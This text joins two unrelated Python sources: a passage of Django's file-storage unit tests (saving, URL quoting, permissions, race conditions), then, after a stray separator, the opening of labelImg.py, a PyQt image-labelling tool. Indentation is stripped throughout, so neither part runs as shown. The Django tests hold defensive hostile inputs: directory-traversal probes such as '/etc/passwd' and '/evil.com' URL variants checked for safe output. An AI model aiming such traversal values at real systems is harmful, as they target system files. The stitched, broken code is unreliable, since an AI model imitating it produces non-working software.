self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file', ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
file.write(b'1')
file.seek(0)
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
with file:
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
        File storage returns the full path of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')
        # should encode special chars except ~!*()'
        # like the encodeURIComponent() JavaScript function does
self.assertEqual(
self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
"/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
)
self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")
# #25905: remove leading slashes from file names to prevent unsafe url output
self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
"""
File storage returns a url even when its base_url is unset or modified.
"""
self.storage.base_url = None
with self.assertRaises(ValueError):
self.storage.url('test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
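    # Roughly what FileSystemStorage.url() boils down to -- a simplified
    # sketch, not Django's exact implementation (which also validates names):
    #
    #     from urllib.parse import quote, urljoin
    #     def url(name, base_url):
    #         path = quote(str(name).replace('\\', '/'), safe="/~!*()'")
    #         return urljoin(base_url, path.lstrip('/'))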
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), {'storage_dir_1'})
self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('..')
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, 'error'):
raise FileExistsError()
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file', ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file', ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Exceptions aside from FileNotFoundError are raised.
with self.assertRaises(FileExistsError):
self.storage.save('error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
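    # The behavior under test, roughly sketched (the storage backend's
    # expected handling, not its exact code):
    #
    #     try:
    #         os.makedirs(directory)
    #     except FileNotFoundError:
    #         pass  # lost the race: a concurrent save already created it
    #
    # while any other error (e.g. FileExistsError for a conflicting regular
    # file) propagates to the caller.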
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, 'error.file'):
raise PermissionError()
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
        self.assertFalse(self.storage.exists('raced.file'))
# Exceptions aside from FileNotFoundError are raised.
self.storage.save('error.file', ContentFile('delete with error'))
with self.assertRaises(PermissionError):
self.storage.delete('error.file')
finally:
os.remove = real_remove
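    # The deletion counterpart, sketched: FileNotFoundError means another
    # process already removed the file, which still satisfies delete();
    # anything else (e.g. PermissionError) must surface:
    #
    #     try:
    #         os.remove(path)
    #     except FileNotFoundError:
    #         pass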
def test_file_chunks_error(self):
"""
        Test behavior when file.chunks() raises an error.
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
def test_delete_deletes_directories(self):
tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
self.storage.delete(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
@override_settings(
MEDIA_ROOT='media_root',
MEDIA_URL='media_url/',
FILE_UPLOAD_PERMISSIONS=0o777,
FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
"""
        Properties that use settings values as defaults should be updated
        when the referenced settings change, while explicitly specified
        values should remain unchanged.
"""
storage = self.storage_class(
location='explicit_location',
base_url='explicit_base_url/',
file_permissions_mode=0o666,
directory_permissions_mode=0o666,
)
defaults_storage = self.storage_class()
settings = {
            'MEDIA_ROOT': 'overridden_media_root',
            'MEDIA_URL': 'overridden_media_url/',
'FILE_UPLOAD_PERMISSIONS': 0o333,
'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
}
with self.settings(**settings):
self.assertEqual(storage.base_location, 'explicit_location')
self.assertIn('explicit_location', storage.location)
self.assertEqual(storage.base_url, 'explicit_base_url/')
self.assertEqual(storage.file_permissions_mode, 0o666)
self.assertEqual(storage.directory_permissions_mode, 0o666)
self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
self.assertEqual(
defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
)
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
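# With this scheme a name splits on its first dot, so the counter lands after
# the basename and before all extensions: saving 'a.tar.gz' three times
# yields 'a.tar.gz', then 'a.2.tar.gz', then 'a.3.tar.gz'.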
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class DiscardingFalseContentStorage(FileSystemStorage):
def _save(self, name, content):
if content:
return super()._save(name, content)
return ''
class DiscardingFalseContentStorageTests(FileStorageTests):
storage_class = DiscardingFalseContentStorage
def test_custom_storage_discarding_empty_content(self):
"""
When Storage.save() wraps a file-like object in File, it should include
the name argument so that bool(file) evaluates to True (#26495).
"""
output = StringIO('content')
self.storage.save('tests/stringio', output)
self.assertTrue(self.storage.exists('tests/stringio'))
with self.storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
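# Why #26495 matters, in short: File.__bool__ is based on File.name, so a
# file-like object wrapped without a name is falsy and a storage like the one
# above would silently discard it. A sketch of the trap:
#
#     f = File(StringIO('content'))            # f.name is None -> falsy
#     f = File(StringIO('content'), 'a.txt')   # truthy, content is saved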
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, 'PC_NAME_MAX')
except Exception:
return 255 # Should be safe on most backends
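    # For example, os.pathconf('/tmp', 'PC_NAME_MAX') is typically 255 on
    # ext4; walking up the tree matters because storage.location may not
    # exist yet when this runs.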
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
        # File objects can be assigned to FileField attributes, but shouldn't
        # get committed until the model they're attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
with obj.normal as normal:
normal.open('wb')
normal.write(b'updated')
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b'updated')
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
        # Given that max_length is limited, when multiple files are uploaded
        # under the same name, the filename gets truncated to make room for
        # the _(7 random chars) suffix. When most of the max_length is taken
        # up by dirname + extension and there are not enough characters left
        # in the filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
                objs[1].limited_length.save(filename, ContentFile('Same Content'))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform.startswith('win'),
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
        # Testing FileField with max_length > 255. Most filesystems have a
        # filename length limit of 255. The path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
        # upload_to can be empty, meaning it does not use a subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
        # Load it as a python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], 'conflict')
self.assertRegex(files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
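    # Worked example of the umask arithmetic above: with umask 0o027 and no
    # explicit FILE_UPLOAD_PERMISSIONS, a new file gets
    # 0o666 & ~0o027 == 0o640 (rw-r-----).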
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], 'test')
self.assertRegex(files[1], 'test_%s' % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], '.test')
self.assertRegex(files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
ContentFile can be saved correctly with the filesystem storage,
if it was initialized with either bytes or unicode content.
"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
        Test the File storage API with a file-like object coming from urllib2.urlopen().
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
labelImg.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import codecs
import distutils.spawn
import os
import platform
import re
import sys
import subprocess
import threading
from functools import partial
from collections import defaultdict
try:
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
except ImportError:
# needed for py3+qt4
# Ref:
# http://pyqt.sourceforge.net/Docs/PyQt4/incompatible_apis.html
# http://stackoverflow.com/questions/21217399/pyqt4-qtcore-qvariant-object-instead-of-a-string
if sys.version_info.major >= 3:
import sip
sip.setapi('QVariant', 2)
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import resources
# Add internal libs
from libs.constants import *
from libs.lib import struct, newAction, newIcon, addActions, fmtShortcut, generateColorByText
from libs.settings import Settings
from libs.shape import Shape, DEFAULT_LINE_COLOR, DEFAULT_FILL_COLOR
from libs.canvas import Canvas
from libs.zoomWidget import ZoomWidget
from libs.labelDialog import LabelDialog
from libs.colorDialog import ColorDialog
from libs.labelFile import LabelFile, LabelFileError
from libs.toolBar import ToolBar
from libs.pascal_voc_io import PascalVocReader
from libs.pascal_voc_io import XML_EXT
from libs.yolo_io import YoloReader
from libs.yolo_io import TXT_EXT
from libs.ustr import ustr
from libs.version import __version__
tensor_flow_is_present = True
try:
    import new_predictor
except ImportError:
    # cv2 / tensorflow / keras (pulled in by new_predictor) may be missing;
    # the autolabeling feature is disabled in that case.
    tensor_flow_is_present = False
import json
__appname__ = 'labelImg'
# Utility functions and classes.
def have_qstring():
    '''PyQt5/Py3 got rid of the QString wrapper, as py3 has a native unicode str type.'''
return not (sys.version_info.major >= 3 or QT_VERSION_STR.startswith('5.'))
def util_qt_strlistclass():
return QStringList if have_qstring() else list
class WindowMixin(object):
    # Default working directories for the YOLO autolabeling feature. Note:
    # the Linux branch hardcodes the Russian-localized "Documents" folder
    # ('Документы'), which the rest of the app expects.
    if sys.platform == 'linux':
        _base = os.environ['HOME'] + '/Документы/labelImg'
        os.makedirs(_base + '/Images', exist_ok=True)
        os.makedirs(_base + '/Results', exist_ok=True)
        yolo_img_path = _base + '/Images'
        yolo_res_path = _base + '/Results'
    elif sys.platform.startswith('win'):
        # sys.platform is always 'win32' on Windows, even on 64-bit builds.
        _base = os.environ['HOMEPATH'] + '/Documents/labelImg'
        os.makedirs(_base + '/Images', exist_ok=True)
        os.makedirs(_base + '/Results', exist_ok=True)
        yolo_img_path = _base + '/Images'
        yolo_res_path = _base + '/Results'
    else:
        yolo_img_path = 'Not stated'
        yolo_res_path = 'Not stated'
yolo_config_path = os.path.abspath(os.curdir) + '/weights-configs/config_for_predict_nissan.json'
yolo_weights_path = os.path.abspath(os.curdir) + '/weights-configs/full_yolo_mobilenet_dock.h5-2.hdf5'
yolo_thres = 0.1
def menu(self, title, actions=None):
menu = self.menuBar().addMenu(title)
if actions:
addActions(menu, actions)
return menu
def toolbar(self, title, actions=None):
toolbar = ToolBar(title)
toolbar.setObjectName(u'%sToolBar' % title)
# toolbar.setOrientation(Qt.Vertical)
toolbar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)
if actions:
addActions(toolbar, actions)
self.addToolBar(Qt.LeftToolBarArea, toolbar)
return toolbar
# PyQt5: TypeError: unhashable type: 'QListWidgetItem'
class HashableQListWidgetItem(QListWidgetItem):
def __init__(self, *args):
super(HashableQListWidgetItem, self).__init__(*args)
def __hash__(self):
return hash(id(self))
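# Why the identity hash above is needed, sketched: PyQt5's QListWidgetItem is
# unhashable, yet MainWindow keeps dict mappings in both directions
# (itemsToShapes / shapesToItems), so items must be usable as dict keys:
#
#     item = HashableQListWidgetItem('label')
#     mapping = {item: shape}  # would raise TypeError with a plain item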
class ProgressBar(QMainWindow):
    stop_progress = False
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.pbar = QProgressBar(self)
self.pbar.setGeometry(30, 40, 200, 25)
self.btn = QPushButton('Cancel', self)
self.btn.move(40, 80)
self.btn.clicked.connect(self.cancel)
self.timer = QBasicTimer()
self.step = 0
self.setGeometry(300, 300, 280, 170)
self.setWindowTitle("Progress")
    def cancel(self):
        self.stop_progress = True
        self.close()
    def setProgress(self, progress):
        self.pbar.setValue(progress)
        if progress >= 100:
            self.close()
class MainWindow(QMainWindow, WindowMixin):
FIT_WINDOW, FIT_WIDTH, MANUAL_ZOOM = list(range(3))
def __init__(self, defaultFilename=None, defaultPrefdefClassFile=None, defaultSaveDir=None):
super(MainWindow, self).__init__()
self.setWindowTitle(__appname__)
self.errorWin = None
# Load setting in the main thread
self.settings = Settings()
self.settings.load()
settings = self.settings
# Save as Pascal voc xml
self.defaultSaveDir = defaultSaveDir
self.usingPascalVocFormat = True
self.usingYoloFormat = False
        # For loading all images under a directory
self.mImgList = []
self.dirname = None
self.labelHist = []
self.yoloConfList = [self.yolo_img_path, self.yolo_res_path,self.yolo_config_path, self.yolo_weights_path, self.yolo_thres]
self.lastOpenDir = None
# Whether we need to save or not.
self.dirty = False
self._noSelectionSlot = False
self._beginner = True
self.screencastViewer = self.getAvailableScreencastViewer()
self.screencast = "https://youtu.be/p0nR2YsCY_U"
# Load predefined classes to the list
self.loadPredefinedClasses(defaultPrefdefClassFile)
# Main widgets and related state.
self.labelDialog = LabelDialog(parent=self, listItem=self.labelHist)
self.itemsToShapes = {}
self.shapesToItems = {}
self.prevLabelText = ''
listLayout = QVBoxLayout()
listLayout.setContentsMargins(0, 0, 0, 0)
# Create a widget for using default label
self.useDefaultLabelCheckbox = QCheckBox(u'Use default label')
self.useDefaultLabelCheckbox.setChecked(False)
self.defaultLabelTextLine = QLineEdit()
useDefaultLabelQHBoxLayout = QHBoxLayout()
useDefaultLabelQHBoxLayout.addWidget(self.useDefaultLabelCheckbox)
useDefaultLabelQHBoxLayout.addWidget(self.defaultLabelTextLine)
useDefaultLabelContainer = QWidget()
useDefaultLabelContainer.setLayout(useDefaultLabelQHBoxLayout)
# Create a widget for edit and diffc button
self.diffcButton = QCheckBox(u'difficult')
self.diffcButton.setChecked(False)
self.diffcButton.stateChanged.connect(self.btnstate)
self.editButton = QToolButton()
self.editButton.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
        # Add some of the widgets to listLayout
listLayout.addWidget(self.editButton)
listLayout.addWidget(self.diffcButton)
listLayout.addWidget(useDefaultLabelContainer)
# Create and add a widget for showing current label items
self.labelList = QListWidget()
labelListContainer = QWidget()
labelListContainer.setLayout(listLayout)
self.labelList.itemActivated.connect(self.labelSelectionChanged)
self.labelList.itemSelectionChanged.connect(self.labelSelectionChanged)
self.labelList.itemDoubleClicked.connect(self.editLabel)
# Connect to itemChanged to detect checkbox changes.
self.labelList.itemChanged.connect(self.labelItemChanged)
listLayout.addWidget(self.labelList)
self.dock = QDockWidget(u'Box Labels', self)
self.dock.setObjectName(u'Labels')
self.dock.setWidget(labelListContainer)
# Tzutalin 20160906 : Add file list and dock to move faster
self.fileListWidget = QListWidget()
self.fileListWidget.itemDoubleClicked.connect(self.fileitemDoubleClicked)
filelistLayout = QVBoxLayout()
filelistLayout.setContentsMargins(0, 0, 0, 0)
filelistLayout.addWidget(self.fileListWidget)
fileListContainer = QWidget()
fileListContainer.setLayout(filelistLayout)
self.filedock = QDockWidget(u'File List', self)
self.filedock.setObjectName(u'Files')
self.filedock.setWidget(fileListContainer)
        # Create and add a widget for showing the current yolo parameter paths
self.yoloListWidget = QListWidget()
yololistLayout = QVBoxLayout()
yololistLayout.setContentsMargins(0, 0,0, 0)
yololistLayout.addWidget(self.yoloListWidget)
yoloListContainer = QWidget()
yoloListContainer.setLayout(yololistLayout)
self.yolodock = QDockWidget(u'YOLO configuration', self)
        # Must be unique per dock, otherwise restoreState() can't tell the
        # yolo dock and the class dock apart.
        self.yolodock.setObjectName(u'yoloConfig')
self.yolodock.setWidget(yoloListContainer)
